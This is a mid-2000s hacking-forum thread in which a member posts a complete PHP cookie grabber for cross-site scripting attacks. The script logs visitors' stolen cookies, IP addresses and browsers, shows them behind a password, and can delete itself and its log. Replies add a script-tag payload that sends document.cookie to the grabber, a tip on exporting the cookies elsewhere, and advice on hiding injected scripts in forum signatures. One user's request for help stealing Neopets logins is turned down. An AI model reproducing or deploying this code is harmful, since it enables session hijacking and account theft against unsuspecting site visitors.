Previous Thread
Next Thread
Print Thread
Rate Thread
Cookie Grabber #18904
09/23/05 12:23 AM
09/23/05 12:23 AM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
I just realized that I never posted this. This is a cookie grabber for use with XSS vulnerabilities coded in PHP by me. It's simple yet powerful by allowing you to view the cookies through an XHTML interface. There are even login features if you choose to enable them.

Code
<?php
//Ghost's Cookie grabber v2.0

/* Begin Config Section */

//Password to access stolen cookies
$ConfigPassword = 'example123';

//File to write, chmodded 666
$CookieFile = "example.txt";

//Cookie name, use a-z A-Z 0-9 _
$ConfigCookie = 'make_this_a_complicated_string_a';

//Flag to identify you as wanting to retrieve cookies
$GetCookiesStr = "getcookies";
//Usage: http://www.sitename.tld/path/script.php?getcookies

//Flag to identify you as wanting to delete script and data file
$DeleteStr = "delete";
//Usage: http://www.sitename.tld/path/script.php?delete

//Name of variable you want to recover and store the stolen cookie
$StolenCookieStr = "str";
//Usage: http://www.sitename.tld/path/script.php?str=

//Place to send browser once cookie has been obtained
$Redirect = "http://www.google.com";

/* End Config Section */

$Self = $_SERVER['PHP_SELF'];
$GetCookies = $_GET["$GetCookiesStr"];
$Delete = $_GET["$DeleteStr"];
$StolenCookie = $_GET["$StolenCookieStr"];
/* Un-comment functions below for login features */

/*
//Remove the Symbols above (slash and asterisk) to enable login features.
//Remember to scroll down and remove the other part of the comment as well.
function LoggedIn()
{

global $ConfigCookie;
$Cookie = $_COOKIE["$ConfigCookie"];
if(isset($Cookie)) {
  return true;
} else {
  return false;
}

}

function LogIn()
{
global $ConfigCookie;
setcookie("$ConfigCookie");
DisplayCookies();
}

function Authenticate()
{
$Pass = $_POST['pass'];
global $ConfigPassword;
global $Self;

if($Pass == $ConfigPassword) {
   LogIn();
} else {
   ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Login</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <form action="<?php $Self; ?>" method="post">
   <table border="1" cellspacing="1" cellpadding="1" rules="rows" align="center" width="50%">
    <tr><th>Password</th><td align="center"><input type="password" name="pass" size="25"/></td></tr>
    <tr><td align="center" colspan="2"><input type="submit" value="Login" /></td></tr>
   </table>
  </form>
</body>
</html>

<?php
}

}
//Remove The symbols below (slash and asterisk) to enable login features
*/

function DisplayCookies()
{
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>Cookie Details</title>
  <meta http-equiv="Content-Type" content="text/html; charset=us-ascii" />
</head>
<body>
  <table border="1" cellspacing="1" cellpadding="1" rules="all" align="center" width="75%">
   <tr><th colspan="6">Cookie Details</th></tr>
   <tr><th><small>IP Address</small></th><th><small>User Agent</small></th>
   <th><small>Referer</small></th><th><small>Cookie Values</small></th></tr>
<?php
global $DeleteStr;
global $CookieFile;
$handle = fopen("$CookieFile", "a+");
$CookieFileContent = fread($handle, filesize("$CookieFile"));
$i = 0;
$CookieFileExploded = explode("\n", $CookieFileContent);
$NumCFE = count($CookieFileExploded) - 1;
while($i < $NumCFE) {
$j = $i + 1;
$k = $j + 1;
$l = $k + 1;
echo '<tr><td align="center"><small>' . "$CookieFileExploded[$i]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$j]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$k]"
. '</small></td><td align="center"><small>' . "$CookieFileExploded[$l]"
. '</small></td></tr>' . "\n";
$i = $i + 4;
}
?>
  </table>
  


  <center><b><a href="<?php echo $Self; ?>?<?php echo $DeleteStr; ?>"><pre><font color="#000">Delete Script and Datafile</font></pre></a></b></center>
</body>
</html>
<?php
}


function SelfDestruct()
{
global $CookieFile;
$FSSelf = __FILE__;
if(file_exists($CookieFile)) {
unlink($CookieFile);
}
unlink($FSSelf);
}



function WriteCookies()
{
global $CookieFile;
global $StolenCookie;
global $Redirect;
global $Path;
$IP = $_SERVER['REMOTE_ADDR'];
$Browser = $_SERVER['HTTP_USER_AGENT'];
$Referer = $_SERVER['HTTP_REFERER'];
if($Browser == NULL) {
$Browser = "NULL";
}

if($Referer == NULL) {
$Referer = "NULL";
}

if($StolenCookie == NULL) {
$StolenCookie = "NULL";
}

$handle = fopen("$CookieFile", "a+");
$Content = "$IP" . "\n" . "$Browser" . "\n" . "$Referer" . "\n" . "$StolenCookie" . "\n";
if(is_writeable("$CookieFile")) {
$Write = fwrite($handle, "$Content");
}
header("Location: $Redirect");
fclose($handle);
}

if(function_exists('LoggedIn') && LoggedIn()) {

if(isset($Delete)) {
SelfDestruct();
die();
}

DisplayCookies();

} elseif(isset($GetCookies)) {

if(function_exists('Authenticate')) {

Authenticate();

} else {
DisplayCookies();
}

} elseif(isset($Delete)) {
SelfDestruct();
die();
} else {
WriteCookies();
}
?>
(Feature added)

Re: Cookie Grabber #18905
09/23/05 05:27 PM
09/23/05 05:27 PM
Joined: Dec 2002
Posts: 3,255
Likes: 3
Maryland
§intå× Offline
UGN Elite
§intå×  Offline
UGN Elite

Joined: Dec 2002
Posts: 3,255
Maryland
can you set it to grab all cookies a user has grabbed?

Re: Cookie Grabber #18906
09/23/05 08:29 PM
09/23/05 08:29 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
If you mean by exporting the grabbed cookies somewhere other than they were hosted, you could do that by having the script request another URL via fopen with the cookie variable stored in the URL.

Re: Cookie Grabber #18907
01/14/06 04:23 AM
01/14/06 04:23 AM
Joined: Jan 2006
Posts: 1
England
S
Spiky Offline
Junior Member
Spiky  Offline
Junior Member
S

Joined: Jan 2006
Posts: 1
England
Could you tell me how to use it?

Re: Cookie Grabber #18908
01/14/06 04:00 PM
01/14/06 04:00 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
I answered that question in the PM you sent me.

Re: Cookie Grabber #18909
01/16/06 01:58 PM
01/16/06 01:58 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
Okay, people. I've been getting WAY too many private messages that could be resolved in this thread. If you have questions about this cookie grabber, or XSS in general, reply to this thread. If you need to, create a new thread, but DON'T private message me with that crap. I wont answer anything about this in a private message any longer. Private messages should be used to address things that can not be delt with in a public thread.

Re: Cookie Grabber #18910
01/16/06 03:18 PM
01/16/06 03:18 PM
Joined: Jan 2006
Posts: 1
Hidden.
N
nalwieno Offline
Junior Member
nalwieno  Offline
Junior Member
N

Joined: Jan 2006
Posts: 1
Hidden.
The code doesn't seem to function correctly in xanga. Is this code supposed to stand alone?

Re: Cookie Grabber #18911
01/16/06 04:35 PM
01/16/06 04:35 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
Yes.

Re: Cookie Grabber #18913
01/18/06 09:48 PM
01/18/06 09:48 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
You can't just 'steal' cookies. You have to exploit a browser that trusts javascript. Javascript combined with XSS (Cross site scripting) tecniques will allow you to steal cookies.

I'd suggest searching for information about XSS, cookies, javascript, and the HTTP protocol.

Re: Cookie Grabber #18915
01/19/06 03:58 PM
01/19/06 03:58 PM
Joined: Jan 2006
Posts: 4
Idaho
N
Neokd101 Offline
Junior Member
Neokd101  Offline
Junior Member
N

Joined: Jan 2006
Posts: 4
Idaho
If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies what woul the code look like

Re: Cookie Grabber #18916
01/19/06 04:14 PM
01/19/06 04:14 PM
Joined: Jan 2006
Posts: 4
Idaho
N
Neokd101 Offline
Junior Member
Neokd101  Offline
Junior Member
N

Joined: Jan 2006
Posts: 4
Idaho
and it sent the grabbe cookies to an email address

Re: Cookie Grabber #18917
01/19/06 05:56 PM
01/19/06 05:56 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
..and it stole their neopets password?

Quote:
Originally posted by Neokd101:
have you heard of neopets?? Well if i wanted to cookie grab someones password and username and have it sent to a email address. what would the script look like. so if i put it on a webpage and they visited the webpage it took their username and password and sent it to my emai
haha....

Re: Cookie Grabber #18918
01/20/06 09:15 AM
01/20/06 09:15 AM
Joined: Jan 2006
Posts: 4
Idaho
N
Neokd101 Offline
Junior Member
Neokd101  Offline
Junior Member
N

Joined: Jan 2006
Posts: 4
Idaho
so can it be done

Re: Cookie Grabber #18919
01/20/06 02:30 PM
01/20/06 02:30 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
Yes it can be done, and I hope you don't expect a walk through.

If you want to know "If you wanted to make it so that you coded this into a website and when someone visited it, it took their cookies what and it sent the grabbe cookies to an email address woul the code look like", I suggest learning how to write PHP scripts or paying a professional to write it for you.

If you plan on utilizing such vulnerabilities, I expect you'll want to read about XSS, javascript, HTML, and the HTTP protocol.

Re: Cookie Grabber #18920
01/20/06 07:08 PM
01/20/06 07:08 PM
Joined: Jan 2006
Posts: 4
Idaho
N
Neokd101 Offline
Junior Member
Neokd101  Offline
Junior Member
N

Joined: Jan 2006
Posts: 4
Idaho
there would be now way i could get you to do it for me?? I just was thinking that dont you have to tweak the code you posted above to get it to work.

Re: Cookie Grabber #18921
01/20/06 09:51 PM
01/20/06 09:51 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
There is absolutely no way I would do this for you, other than you paying me for the services. The fact is, I wrote that script for my personal use. I released it publicly because I believed that some people may find a use for the code, and be able to include or adapt it for their own releases. I don't intend to write code updates for somebody who wants to use it for a really lame purpose that I honestly don't care about. As Gizmo has put it "We're not here to hold your hand while you piss."

So, to help you out here, I will NOT be writing code for you, and if I were you, I would think it unwise to keep persiting along this line of questioning.

Don't expect to come into a community like this, ask a question, and expect everyone to drop everything they're doing just to help you with your stupid little want to gain access to some lame account on some lame website. Those of us here who know how to write code have taken time and energy to do it, and having someone who has absolutely no knowledge on the subject, or a wish to learn on the subject, is insulting to all of us who do care about what we're learning and want to learn more.

Re: Cookie Grabber #18922
05/21/06 08:32 AM
05/21/06 08:32 AM
Joined: May 2006
Posts: 1
no
D
danger Offline
Junior Member
danger  Offline
Junior Member
D

Joined: May 2006
Posts: 1
no
How do you know there username when they log on?

Re: Cookie Grabber #18923
05/21/06 01:08 PM
05/21/06 01:08 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
Don't even worry about it.

Re: Cookie Grabber [Re: Neokd101] #41165
11/01/06 07:15 PM
11/01/06 07:15 PM
Joined: Nov 2006
Posts: 1
K
KurtK Offline
UGN Newbie
KurtK  Offline
UGN Newbie
K

Joined: Nov 2006
Posts: 1
For those of you having trouble getting this to work, here's a hint:

<SCRIPT>location.href = "http://www.examplesite.com/script.php?str="+document.cookie</SCRIPT>

Thanks tons for this, Ghost laugh

Sorry for the necro-bump, but I stumbled on this thread through google and it really helped me out.

Last edited by KurtK; 11/01/06 07:17 PM.
Re: Cookie Grabber [Re: KurtK] #41166
11/01/06 11:45 PM
11/01/06 11:45 PM
Joined: Feb 2002
Posts: 7,203
Likes: 11
Portland, OR; USA
Gremelin Offline

Community Owner
Gremelin  Offline

Community Owner

Joined: Feb 2002
Posts: 7,203
Portland, OR; USA
You may want to look up the validity for the script tag's if embedding it randomly in sig's... keep in mind that a lot of sites are becoming more and more xhtml valid, and you'll give away what you're doing if it's throwing off the sites natural validity wink


Donate to UGN Security here.
UGN Security, Back of the Web, and VNC Web Services Owner
Re: Cookie Grabber [Re: Gremelin] #41169
11/02/06 06:41 PM
11/02/06 06:41 PM
Joined: Jun 2003
Posts: 807
Likes: 2
Wisconsin
G
Ghost Offline OP
UGN Super Poster
Ghost  Offline OP
UGN Super Poster
G

Joined: Jun 2003
Posts: 807
Wisconsin
It's a nice bit of code. I should really go through and remove the global variables though.


Member Spotlight
Gremelin
Gremelin
Portland, OR; USA
Posts: 7,203
Joined: February 2002
Show All Member Profiles 
Forum Statistics
Forums41
Topics33,680
Posts68,696
Average Daily Posts0
Members2,171
Most Online1,567
Apr 25th, 2010
Latest Postings
Blackbeard.....
by Gremelin. 10/03/18 07:02 PM
my old account still exists!
by Crime. 08/10/18 02:47 PM
Top Posters(All Time)
UGN Security 41,392
Gremelin 7,203
§intå× 3,255
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Top Liked Users (All Time)
§intå× Likes: 3
Black Beard Likes: 1
Cold Sunn Likes: 1
Crime Likes: 1
Cyrez Likes: 1
Dartur Likes: 1
fleshwound Likes: 1
Ghost Likes: 2
Girlie Likes: 1
Gremelin Likes: 14
Powered by UBB.threads™ PHP Forum Software 7.7.0